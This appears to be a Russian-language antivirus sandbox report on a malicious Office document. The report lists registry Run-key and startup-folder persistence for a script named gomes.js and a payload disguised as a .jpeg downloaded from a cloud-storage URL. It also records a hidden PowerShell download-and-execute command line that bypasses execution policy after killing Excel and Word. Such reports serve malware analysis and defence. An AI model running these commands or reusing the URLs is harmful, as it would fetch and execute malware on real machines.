Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'BYP2PGI20Q' = '"%TEMP%\gomes.js"'
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\gomes.js
Вредоносные функции
Загружает и запускает на исполнение
- https://storage.googleapis.com/wzukusers/user-34654398/documents/5c782aa3aade47wjr0su/gomes.jpeg как %temp%\gomes.js
- https://storage.googleapis.com/wzukusers/user-34654398/documents/5c782aa3aade47wjr0su/gomes.jpeg как c:\users\public\gomes.js
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im excel.exe
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFi...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\gomes.js
- C:\users\public\gomes.js
Сетевая активность
TCP
- 'st#####.googleapis.com':443
UDP
- DNS ASK st#####.googleapis.com
- DNS ASK ce####a.ddns.net
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\gomes.js"
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\gomes.js"
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFi...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\ping.exe' -n 3 localhost
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\gomes.js"
- '<SYSTEM32>\wscript.exe' "%TEMP%\gomes.js"
